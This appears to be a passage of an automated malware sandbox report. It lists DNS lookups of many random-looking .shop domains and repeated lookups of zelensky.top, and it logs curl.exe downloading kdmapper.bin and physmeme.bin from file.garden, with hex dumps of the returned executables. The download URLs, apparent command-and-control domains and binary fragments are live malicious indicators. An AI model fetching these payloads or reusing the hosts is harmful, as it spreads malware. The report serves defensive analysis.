                                                                                                                                                                      Sep 30, 2024 18:20:48.039678097 CEST5114953192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:20:48.134674072 CEST53511491.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:20:54.535640955 CEST5566153192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:20:54.626338959 CEST53556611.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:21:01.434288979 CEST6385253192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:21:01.524498940 CEST53638521.1.1.1192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:21:12.107844114 CEST6096453192.168.2.81.1.1.1
                                                                                                                                                                      Sep 30, 2024 18:21:12.117625952 CEST53609641.1.1.1192.168.2.8
                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Sep 30, 2024 18:19:11.220010996 CEST192.168.2.81.1.1.10x5976Standard query (0)file.gardenA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.762079954 CEST192.168.2.81.1.1.10xf0e7Standard query (0)tiddymarktwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.780191898 CEST192.168.2.81.1.1.10xb78fStandard query (0)surveriysiop.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.793556929 CEST192.168.2.81.1.1.10xc58bStandard query (0)captainynfanw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.808005095 CEST192.168.2.81.1.1.10x2afcStandard query (0)tearrybyiwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.819789886 CEST192.168.2.81.1.1.10x10dStandard query (0)appleboltelwk.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.832659960 CEST192.168.2.81.1.1.10x69b4Standard query (0)tendencerangej.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.845072985 CEST192.168.2.81.1.1.10x58b6Standard query (0)fossillargeiw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.858484983 CEST192.168.2.81.1.1.10xdd66Standard query (0)coursedonnyre.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.869632959 CEST192.168.2.81.1.1.10xed88Standard query (0)strappystyio.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.890495062 CEST192.168.2.81.1.1.10x10e4Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:44.883356094 CEST192.168.2.81.1.1.10x36eStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:58.251636028 CEST192.168.2.81.1.1.10xcbe7Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:06.543725967 CEST192.168.2.81.1.1.10x530aStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:14.626483917 CEST192.168.2.81.1.1.10x894cStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:32.463187933 CEST192.168.2.81.1.1.10x1f9Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:40.999475002 CEST192.168.2.81.1.1.10xcabcStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:48.039678097 CEST192.168.2.81.1.1.10xe0d8Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:54.535640955 CEST192.168.2.81.1.1.10x2872Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:21:01.434288979 CEST192.168.2.81.1.1.10x2dadStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:21:12.107844114 CEST192.168.2.81.1.1.10x5920Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Sep 30, 2024 18:19:11.233417034 CEST1.1.1.1192.168.2.80x5976No error (0)file.garden188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:11.233417034 CEST1.1.1.1192.168.2.80x5976No error (0)file.garden188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.774982929 CEST1.1.1.1192.168.2.80xf0e7Name error (3)tiddymarktwo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.790380955 CEST1.1.1.1192.168.2.80xb78fName error (3)surveriysiop.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.805269003 CEST1.1.1.1192.168.2.80xc58bName error (3)captainynfanw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.817322969 CEST1.1.1.1192.168.2.80x2afcName error (3)tearrybyiwo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.830327988 CEST1.1.1.1192.168.2.80x10dName error (3)appleboltelwk.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.842688084 CEST1.1.1.1192.168.2.80x69b4Name error (3)tendencerangej.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.855815887 CEST1.1.1.1192.168.2.80x58b6Name error (3)fossillargeiw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.868278980 CEST1.1.1.1192.168.2.80xdd66Name error (3)coursedonnyre.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.887676001 CEST1.1.1.1192.168.2.80xed88Name error (3)strappystyio.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:16.897443056 CEST1.1.1.1192.168.2.80x10e4No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:44.892527103 CEST1.1.1.1192.168.2.80x36eName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:19:58.468884945 CEST1.1.1.1192.168.2.80xcbe7Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:06.637161016 CEST1.1.1.1192.168.2.80x530aName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:14.715432882 CEST1.1.1.1192.168.2.80x894cName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:32.673240900 CEST1.1.1.1192.168.2.80x1f9Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:41.330818892 CEST1.1.1.1192.168.2.80xcabcName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:48.134674072 CEST1.1.1.1192.168.2.80xe0d8Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:20:54.626338959 CEST1.1.1.1192.168.2.80x2872Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:21:01.524498940 CEST1.1.1.1192.168.2.80x2dadName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Sep 30, 2024 18:21:12.117625952 CEST1.1.1.1192.168.2.80x5920Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      • file.garden
                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.849706188.114.96.34433832C:\Windows\System32\curl.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-09-30 16:19:11 UTC104OUTGET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1
                                                                                                                                                                      Host: file.garden
                                                                                                                                                                      User-Agent: curl/7.83.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      2024-09-30 16:19:11 UTC825INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 30 Sep 2024 16:19:11 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 2284739
                                                                                                                                                                      Connection: close
                                                                                                                                                                      x-powered-by: Express
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                      last-modified: Fri, 20 Sep 2024 19:21:00 GMT
                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 853070
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fqjbsxCsZR94LyIBxFO1%2FP50aGTp%2B%2FDUqkADzL9P8nu9ag3cQH2DPkEgQ5re%2B0ZaRYJ%2BJfubS1%2BedC%2F5hdvSkkveRDZSn556Y8LcUTG2O%2FdwrpXumg9BVb2witEQbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8cb5887efa50c425-EWR
                                                                                                                                                                      2024-09-30 16:19:11 UTC544INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d
                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
                                                                                                                                                                      2024-09-30 16:19:11 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii: `.rdata0 @@.data G@.didat0@.rsrc@@@.reloc<# $@B
                                                                                                                                                                      2024-09-30 16:19:11 UTC1369INData Raw: 75 08 b9 30 10 44 00 e8 3c cf 00 00 32 c0 5d c2 1c 00 55 8b ec 83 ec 4c ff 75 08 8d 4d b4 e8 2a 02 00 00 8b 4d f4 83 f9 08 73 0a 8b 45 0c 89 44 8d b4 ff 45 f4 8d 4d b4 e8 48 02 01 00 c9 c2 08 00 56 ff 74 24 08 8b f1 33 c0 89 06 89 46 04 89 46 08 89 46 0c 88 46 10 e8 5c 03 00 00 8b c6 5e c2 04 00 b8 35 26 43 00 e8 92 d7 01 00 51 51 53 56 8b f1 89 75 f0 e8 62 81 00 00 33 db c7 06 f8 35 43 00 8d 8e 38 10 00 00 89 5d fc e8 2d 4a 00 00 8d 8e f8 20 00 00 c6 45 fc 01 e8 27 ba 00 00 8d 8e 98 22 00 00 89 9e e8 21 00 00 89 9e ec 21 00 00 e8 4a 01 00 00 8d 8e e8 45 00 00 e8 3f 01 00 00 8b 4d 08 85 c9 c6 45 fc 04 0f 94 c0 89 9e d4 21 00 00 88 86 d0 21 00 00 85 c9 75 23 68 f0 92 00 00 e8 d7 d6 01 00 59 89 45 ec c6 45 fc 05 85 c0 74 09 8b c8 e8 91 a0 00 00 eb 06 8b c3
                                                                                                                                                                      Data Ascii: u0D<2]ULuM*MsEDEMHVt$3FFFF\^5&CQQSVub35C8]-J E'"!!JE?ME!!u#hYEEt
                                                                                                                                                                      2024-09-30 16:19:11 UTC1369INData Raw: 1f 38 86 dd 6c 00 00 75 0b 8d 46 32 50 6a 39 e8 a5 fa ff ff 6a 02 b9 98 10 44 00 e8 3f 53 00 00 5e c2 04 00 53 56 8b f1 33 db 57 53 8b 3e 38 9e 3c 22 00 00 74 3d 8b 86 d8 6c 00 00 8b 4f 10 83 c0 14 53 50 ff 15 78 32 43 00 8b ce ff 57 10 8b ce e8 05 22 00 00 85 c0 74 15 83 be f4 21 00 00 75 75 0c 8b 44 24 10 39 58 04 0f 97 c0 eb 3c 32 c0 eb 38 e8 85 08 00 00 8b 4f 10 52 50 ff 15 78 32 43 00 8b ce ff 57 10 68 70 36 43 00 8b ce e8 3d 26 00 00 85 c0 74 11 ff 74 24 10 8b ce e8 db 04 00 00 84 c0 74 02 b3 01 8a c3 5f 5e 5b c2 04 00 80 b9 d4 6c 00 00 00 8b 54 24 04 74 1a 8b c2 f7 d8 83 e0 0f 03 d0 83 b9 c8 6c 00 00 03 75 05 83 c2 10 eb 03 83 c2 08 8b c2 c2 04 00 55 8b e9 80 bd ce 6c 00 00 00 75 04 32 c0 eb 41 8b 45 00 53 56 57 8b 70 14 8b ce ff 15 78 32 43 00 8b
                                                                                                                                                                      Data Ascii: 8luF2Pj9jD?S^SV3WS>8<"t=lOSPx2CW"t!uuD$9X<28ORPx2CWhp6C=&tt$t_^[lT$tluUlu2AESVWpx2C
                                                                                                                                                                      2024-09-30 16:19:11 UTC1369INData Raw: 05 07 75 1c 8a 40 06 84 c0 75 04 6a 02 eb 10 3c 01 75 04 6a 03 eb 08 2c 02 3c 02 77 03 6a 04 59 8b c1 c2 08 00 b8 73 26 43 00 e8 1e cd 01 00 83 ec 18 53 33 db 8b c1 89 45 f0 89 5d dc 89 5d e0 89 5d e4 89 5d e8 88 5d ec 53 53 8d 4d dc 89 5d fc 51 8b c8 e8 36 1d 00 00 84 c0 0f 84 83 00 00 00 56 57 8b 7d e0 8d 4d dc 6a 01 e8 97 f8 ff ff 8b 4d e0 8b 45 dc 8b 75 08 88 5c 01 ff 8d 47 01 50 8b ce e8 f6 f9 ff ff 8b 45 f0 83 b8 c8 6c 00 00 03 75 0f ff 76 04 ff 36 ff 75 dc e8 6f fd 00 00 eb 2d f6 80 0c 46 00 00 01 74 17 d1 ef 57 ff 36 ff 75 dc e8 19 fd 00 00 8b 06 33 c9 66 89 0c 78 eb 0d ff 76 04 ff 36 ff 75 dc e8 89 fc 00 00 ff 36 e8 11 1f 02 00 59 50 8b ce e8 9e f9 ff ff 5f b3 01 5e 8b 45 dc c7 45 fc 02 00 00 00 85 c0 74 19 80 7d ec 00 74 0c ff 75 e4 50 e8 19 d5
                                                                                                                                                                      Data Ascii: u@uj<uj,<wjYs&CS3E]]]]]SSM]Q6VW}MjMEu\GPEluv6uo-FtW6u3fxv6u6YP_^EEt}tuP
                                                                                                                                                                      2024-09-30 16:19:11 UTC1369INData Raw: 04 00 00 83 7b 04 03 8b e9 75 0d 8b 47 18 2b c2 83 f8 01 75 03 8d 69 01 8d b3 28 10 00 00 55 8b ce e8 13 fd ff ff 55 ff 36 8b cf e8 a9 a8 00 00 e9 90 04 00 00 8b cf e8 3b a9 00 00 8b c8 89 44 24 20 c1 e9 02 8d ab 08 21 00 00 80 e1 01 88 8b 06 21 00 00 8b c8 c1 e9 03 80 e1 01 88 8b 07 21 00 00 c6 83 08 22 00 00 00 c6 45 00 00 a8 01 74 29 8b cf e8 ff a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 55 8b cf e8 4b a8 00 00 8b 44 24 20 c6 84 1e 08 21 00 00 00 a8 02 74 2b 8b cf e8 d2 a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 8d 83 08 22 00 00 8b cf 50 e8 18 a8 00 00 c6 84 1e 08 22 00 00 00 80 bb 06 21 00 00 00 74 0d 8b cf e8 9e a8 00 00 89 83 08 23 00 00 80 bb 07 21 00 00 00 74 0d 8b cf e8 88 a8 00 00 89 83 0c 23 00 00 c6 83 05 21 00 00 01 e9 c4 03
                                                                                                                                                                      Data Ascii: {uG+ui(UU6;D$ !!!"Et);rVUKD$ !t+;rV"P"!t#!t#!
                                                                                                                                                                      2024-09-30 16:19:11 UTC1369INData Raw: ff 15 78 32 43 00 8b cb ff d6 83 f8 08 74 0c 8b cb e8 09 17 00 00 e9 e2 09 00 00 33 c9 8d 45 40 51 51 51 51 50 8b 83 d4 21 00 00 8d b3 38 10 00 00 05 24 60 00 00 50 6a 04 51 8b ce e8 1c 37 00 00 89 75 3c eb 03 88 4d 5a 57 8d 4d 1c e8 5b a4 00 00 83 7d 34 00 74 b7 8d 4d 1c e8 89 a2 00 00 0f b7 c0 8d 4d 1c 89 83 fc 21 00 00 c6 83 0c 22 00 00 00 e8 5a a2 00 00 8d 4d 1c 0f b6 f0 e8 66 a2 00 00 0f b7 c0 8d 4d 1c 89 83 04 22 00 00 c1 e8 0e 24 01 88 83 0c 22 00 00 e8 4a a2 00 00 0f b7 c8 89 8b 08 22 00 00 89 b3 00 22 00 00 3b cf 73 0c 8b cb e8 41 f7 ff ff e9 3f 09 00 00 8b c6 6a 02 5a 83 e8 73 74 2a 83 e8 01 74 1b 83 e8 06 74 09 83 e8 01 75 28 6a 05 eb 02 6a 03 58 89 83 00 22 00 00 8b f0 eb 17 89 93 00 22 00 00 8b f2 eb 0d 33 f6 c7 83 00 22 00 00 01 00 00 00 46
                                                                                                                                                                      Data Ascii: x2Ct3E@QQQQP!8$`PjQ7u<MZWM[}4tMM!"ZMfM"$"J"";sA?jZst*ttu(jjX""3"F
                                                                                                                                                                      2024-09-30 16:19:11 UTC1369INData Raw: 00 00 8d 85 d0 df ff ff 50 e8 4c 10 02 00 40 59 3b f8 76 22 68 00 08 00 00 ff 75 54 8b cf 2b c8 51 8d 8d d0 df ff ff 03 c1 50 8b c1 8d 4d 00 57 50 e8 1a 3b 00 00 8b 4d 54 33 c0 66 39 01 75 14 6a 01 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 30 d4 00 00 56 8b cb e8 a2 f2 ff ff e9 3f 01 00 00 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 db ec 00 00 8b 46 0c 2b 45 50 f7 46 08 00 04 00 00 8d 78 e0 74 03 8d 78 d8 85 ff 0f 8e f6 00 00 00 8d 8e 28 10 00 00 57 e8 eb f1 ff ff 57 8d be 28 10 00 00 ff 37 8d 4d 1c e8 7a 9d 00 00 68 78 36 43 00 ff 75 54 e8 59 0f 02 00 59 59 85 c0 0f 85 c2 00 00 00 83 be 2c 10 00 00 14 0f 82 b5 00 00 00 8b 0f 0f b6 41 0b 99 8b f0 8b fa 0f b6 41 0a 0f a4 f7 08 99 c1 e6 08 03 f0 0f b6 41 09 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 0f b6 41 08 13
                                                                                                                                                                      Data Ascii: PL@Y;v"huT+QPMWP;MT3f9ujhQP0V?hQPF+EPFxtx(WW(7Mzhx6CuTYYY,AAAA
                                                                                                                                                                      2024-09-30 16:19:11 UTC1369INData Raw: 15 78 32 43 00 8b cb ff d6 83 f8 10 0f 85 17 01 00 00 8b 83 d4 21 00 00 80 b8 24 61 00 00 00 75 0d e8 ae e7 00 00 c6 45 6b 00 84 c0 74 04 c6 45 6b 01 8b cb e8 a5 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 8d bb 7c 22 00 00 57 05 24 60 00 00 8d b3 38 10 00 00 50 6a 05 51 8b ce e8 3e 2c 00 00 80 bb 74 22 00 00 00 74 7d 8d 83 8c 22 00 00 6a 08 50 8d 45 28 50 e8 33 d8 01 00 83 c4 0c 85 c0 74 64 80 7d 6b 00 8d 43 32 50 50 75 5e 68 83 00 00 00 e8 ee eb ff ff 8b 8b d4 21 00 00 81 c1 24 60 00 00 e8 35 be 00 00 8b cb e8 22 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 57 05 24 60 00 00 50 6a 05 51 8b ce e8 c7 2b 00 00 80 bb 74 22 00 00 00 8d 83 8c 22 00 00 75 89 89 75 50 eb 22 6a 06 e8 93 eb ff ff
                                                                                                                                                                      Data Ascii: x2C!$auEktEkE(3PQx"EP!|"W$`8PjQ>,t"t}"jPE(P3td}kC2PPu^h!$`5"E(3PQx"EP!W$`PjQ+t""uuP"j
                                                                                                                                                                      2024-09-30 16:19:11 UTC1369INData Raw: 00 8d 4d 30 e8 0a 94 00 00 8d 4d 30 88 46 18 e8 ff 93 00 00 8b 8b 04 22 00 00 33 d2 c1 e9 06 42 8b f8 c7 86 fc 10 00 00 02 00 00 00 8a 46 18 22 ca 88 8e f8 10 00 00 3a c2 75 08 89 96 fc 10 00 00 eb 0b 84 c0 75 07 83 a6 fc 10 00 00 00 8b 4e 08 8b c1 c1 e8 03 22 c2 88 86 98 10 00 00 8b c1 c1 e9 05 c1 e8 04 22 ca 22 c2 88 8e fa 10 00 00 83 7d 64 02 8b 4d 60 88 86 99 10 00 00 75 09 f6 c1 40 74 04 8a c2 eb 02 32 c0 88 86 f0 10 00 00 8a 86 94 10 00 00 22 c2 c1 e9 0a 88 86 f1 10 00 00 83 e1 0f 0f b6 c0 ba 00 00 02 00 d3 e2 f7 d8 1b c0 f7 d0 23 c2 89 86 f4 10 00 00 0f b6 86 9b 10 00 00 f7 d8 1b c0 83 e0 05 89 86 9c 10 00 00 b8 ff 1f 00 00 3b f8 72 02 8b f8 57 8d 85 8c df ff ff 50 8d 4d 30 e8 8a 92 00 00 c6 84 3d 8c df ff ff 00 8d 85 8c df ff ff 68 00 08 00 00 8d
                                                                                                                                                                      Data Ascii: M0M0F"3BF":uuN"""}dM`u@t2"#;rWPM0=h


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.849709188.114.96.34434424C:\Windows\System32\curl.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-09-30 16:19:14 UTC104OUTGET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1
                                                                                                                                                                      Host: file.garden
                                                                                                                                                                      User-Agent: curl/7.83.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      2024-09-30 16:19:14 UTC816INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 30 Sep 2024 16:19:14 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 370176
                                                                                                                                                                      Connection: close
                                                                                                                                                                      x-powered-by: Express
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                      last-modified: Sun, 22 Sep 2024 19:01:04 GMT
                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 681397
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3uM7MGcAJDKOrvK3%2BhjkHsJzM2184K41zt78gAB8IEACMKtXK%2FOg8q6LgVi%2BD7Cn0YYHqpkS7N6s80QCw70z9oT53B5al1K3cLvmtyejt6XJFJW8XRd3Brtk31fgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8cb58890c9324328-EWR
                                                                                                                                                                      2024-09-30 16:19:14 UTC553INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 57 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 be bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWf @ `
                                                                                                                                                                      2024-09-30 16:19:14 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 39 6d 95 5b 1c e7 2e 7b bf 94 a8 e9 8e 56 e9 5f 41 b3 ac 5f e4 ac 13 58 c3 bf b8 5b 6d 93 27 cd e6 23 51 f2 b8 9f 1c 93 a1 8d dd 2e 5b ca d0 8d 2b 48 f0 3c fc 85 66 5a f5 10 7c e6 ca aa 13 03 07 6d 26 d3 2e 1d a0 19 bf 79 aa bb 3b 4b 52 05 a6 94 af 37 a1 e7 53 c2 c0 6b 93 6d 3f f3 b7 38 08 a7 49 44 26 de 21 30 25 4e 21 5c 01 5c 06 cb 4c 5e 1e 1b cd 88 30 5c 11 b1 df cf 02 6a 7c a1 4d 85 ac fa af 1f 8a 8c 0f eb 4d ab 3b db 2a 86 71 ff b7 55 4f fa e8 21 27 b3 f3 25 2e 20 64 ba 45 ee 75 97 cb 8a 83 ea ee d2 51 2d 77 d4 a5 24 49 01 be e9 58 8f df d0 30 64 10 b5 f9 06 ea 88 a4 eb 9f 66 bd 24 7c 28 09 67 45 a9 4e 10 89 8c 33 a0 4a 99 0d 2a 54
                                                                                                                                                                      Data Ascii: 9m[.{V_A_X[m'#Q.[+H<fZ|m&.y;KR7Skm?8ID&!0%N!\\L^0\j|MM;*qUO!'%. dEuQ-w$IX0df$|(gEN3J*T
